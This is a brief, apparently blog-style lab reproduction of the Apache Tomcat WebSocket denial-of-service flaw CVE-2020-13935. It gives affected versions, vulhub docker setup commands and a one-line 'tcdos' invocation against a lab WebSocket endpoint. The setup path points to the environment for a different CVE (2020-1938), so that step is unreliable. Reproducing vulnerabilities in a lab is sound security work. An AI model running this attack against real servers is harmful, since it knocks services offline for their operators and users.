Apache Tomcat Websocket Denial Of Service Vulnerability Cve 2020 13935
Apache Tomcat Websocket Denial Of Service Vulnerability Cve 2020 13935
Apache Tomcat WebSocket Denial of Service Vulnerability CVE-2020-13935
Vulnerability Description
On November 6, 2020, 360CERT monitoring found that @RedTeamPentesting released an analysis report on Tomcat WebSokcet Denial of Service Vulnerability. The vulnerability number is CVE-2020-13935, vulnerability level: High Risk, vulnerability score: 7.5.
Unauthorized remote attackers can stop responding and fail to provide normal services by sending large number of specially crafted request packets to the Tomcat server.
Vulnerability Impact
Apache Tomcat 10.0.0-M1-10.0.0-M6 Apache Tomcat 9.0.0.M1-9.0.36 Apache Tomcat 8.5.0-8.5.56 Apache Tomcat 7.0.27-7.0.104
Environment construction
1
2
3
https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2020-1938
docker-compose up -d
Vulnerability reappears
Access the target to see if the version is within the scope of the vulnerable version
Check the memory usage before the attack
</a-alert>
1
tcdos ws://192.168.51.133:8080/examples/websocket/echoStreamAnnotation
This post is licensed under CC BY 4.0 by the author.